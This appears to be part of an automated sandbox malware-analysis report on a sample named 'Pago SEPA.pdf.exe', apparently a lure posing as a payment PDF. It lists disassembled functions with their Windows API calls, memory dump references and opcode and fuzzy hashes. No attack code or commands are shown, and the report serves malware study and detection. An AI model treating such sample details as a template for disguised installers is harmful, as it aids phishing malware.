                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
                                                                      • Instruction ID: 1e7952006d9e226a8eb598a62733b1cad305e59e596fc6f41a9a7203fe322f79
                                                                      • Opcode Fuzzy Hash: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
                                                                      • Instruction Fuzzy Hash: 9401D131B24210EBE7295B389C05B6A3698E720318F10867EB915F62F1DA78DC028B5D
                                                                      Function 00405251 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OleInitialize.OLE32(00000000), ref: 00405261
                                                                        • Part of subcall function 0040412F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
                                                                      • CoUninitialize.COMBASE(00000404,00000000), ref: 004052AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeMessageSendUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2896919175-0
                                                                      • Opcode ID: 31e57a3ef9e746435923b88dfd7bb1bf8fe4b89e6011e28fe58d1acc60f219fe
                                                                      • Instruction ID: 23d8d539379559b4eeea4a3d011d76145f80a4753e0c5d54cb32e1048881e4d2
                                                                      • Opcode Fuzzy Hash: 31e57a3ef9e746435923b88dfd7bb1bf8fe4b89e6011e28fe58d1acc60f219fe
                                                                      • Instruction Fuzzy Hash: 98F09073A04600EBEA219754A905B5773A4EFA0311F0548BEFE44B62E1D7795C428E6D
                                                                      Function 004063F5 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406422
                                                                        • Part of subcall function 00406389: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063A0
                                                                        • Part of subcall function 00406389: wsprintfW.USER32 ref: 004063DB
                                                                        • Part of subcall function 00406389: LoadLibraryW.KERNELBASE(?), ref: 004063EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: d7ac541ed48af1eacb80342b8b251201fb822529d60d72dade8e8733a6d6c095
                                                                      • Instruction ID: a9e24e321ddd3f073a9e6a165911cd393abac726806fbc755e3780b1e63cb1a6
                                                                      • Opcode Fuzzy Hash: d7ac541ed48af1eacb80342b8b251201fb822529d60d72dade8e8733a6d6c095
                                                                      • Instruction Fuzzy Hash: A7E086326082216BD31157745D4493B67A89BD5740306083EFD06F6181D734AC2296AD
                                                                      Function 00405BF4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                      • Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
                                                                      • Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                      • Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16
                                                                      Function 00405BCF Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,?,004057D4,?,?,00000000,004059AA,?,?,?,?), ref: 00405BD4
                                                                      • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BE8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 12e66bcdd04e2879fdb80b2c332070aab0449f7c07d3bd30d589cafb4efe0379
                                                                      • Instruction ID: bdf799deba5259ae40da9bf86cf5b70a116480e13bafc777f783197d388d6591
                                                                      • Opcode Fuzzy Hash: 12e66bcdd04e2879fdb80b2c332070aab0449f7c07d3bd30d589cafb4efe0379
                                                                      • Instruction Fuzzy Hash: 7BD01272909521AFC6102738EE0C89BBFA5EB54371B054B31F979E22F0C7305C52CA95
                                                                      Function 0040378E Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(FFFFFFFF,004035C0,?), ref: 00403799
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\, xrefs: 004037AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\
                                                                      • API String ID: 2962429428-2318496318
                                                                      • Opcode ID: 547fd846b28b0e52d693a20189030c4991cde11e27edeba9700ea68dca7dd3f7
                                                                      • Instruction ID: 738aafdfbe6b66663d3e75b1abd48ad3a000e6af254a881b2101d9ce03f10e03
                                                                      • Opcode Fuzzy Hash: 547fd846b28b0e52d693a20189030c4991cde11e27edeba9700ea68dca7dd3f7
                                                                      • Instruction Fuzzy Hash: ECC012B4908A0097D1747F74DD8BA053A286784335FA48736B4F9B14F1C73C5A95455E
                                                                      Function 004056CA Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004056D0
                                                                      • GetLastError.KERNEL32 ref: 004056DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                      • Instruction ID: d706e5ae47c7ee36432b9320fd90c1f42ce8b6abbc3a43a90ad219fc8104f268
                                                                      • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                      • Instruction Fuzzy Hash: 5DC04C30A19602DBDA105B31DD0871B7954AB50742F60CD36610AE51A0DA769811DD3E
                                                                      Function 00405C77 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C8B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                      • Instruction ID: b406f17295b0c4e2c80a39b4892fee2aa768816fba0af151b3e099c9f54450aa
                                                                      • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                      • Instruction Fuzzy Hash: 3BE08632114259ABDF119E508C04EEB3B5CEB04350F004436F911E3180D230E9209BA4
                                                                      Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: dee534fb00c3da35f42930a873cbe089bc3ca12b7b75b89d27cc42400959d1ef
                                                                      • Instruction ID: 68f4dbfd07ce8b2f927ba9c023ef299b46c4db6be22e7618382101f0868acce4
                                                                      • Opcode Fuzzy Hash: dee534fb00c3da35f42930a873cbe089bc3ca12b7b75b89d27cc42400959d1ef
                                                                      • Instruction Fuzzy Hash: CCE04F76254108BADB00DFA4DD46EA577ECAB04700F004421BA08D60A1C674E5408768
                                                                      Function 00405CA6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEC0,?,0040BEC0,?,000000FF,00000004,00000000), ref: 00405CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                      • Instruction ID: 8766ac6266e8b07294e6d952513c2b0c694ccf73d68c0bd44325f5ff4784c02c
                                                                      • Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                      • Instruction Fuzzy Hash: D4E08C3222835AABEF119E548C00EEB3B6CEB01360F004833F915E3190E231E9209BA8
                                                                      Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 707dd6335b9c7db9ec9780353f3c6c5f455ace5af073a8b0d4f735f3cee57a73
                                                                      • Instruction ID: 1b5af1e6617a4a9cd807fc22027cae36a39ca3b3e6b8606dbe65da2ef404c620
                                                                      • Opcode Fuzzy Hash: 707dd6335b9c7db9ec9780353f3c6c5f455ace5af073a8b0d4f735f3cee57a73
                                                                      • Instruction Fuzzy Hash: 41D01233B04100DBCB10DFA89A0869D77659B40334B208677D501F21E5D6B9C5515A19
                                                                      Function 0040412F Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: c20ba2f4b44bb730ed9beb80e31de2705d99c650012490af2887c79ee983c6a6
                                                                      • Instruction ID: 1f6dcfa326d5252f97bf96967583e82957cdc04532489552bbed9deb9ca34131
                                                                      • Opcode Fuzzy Hash: c20ba2f4b44bb730ed9beb80e31de2705d99c650012490af2887c79ee983c6a6
                                                                      • Instruction Fuzzy Hash: 26C09B757443017BDA318F509D49F27775867A4700F2544397350F70D0C774E451D61D
                                                                      Function 00404118 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
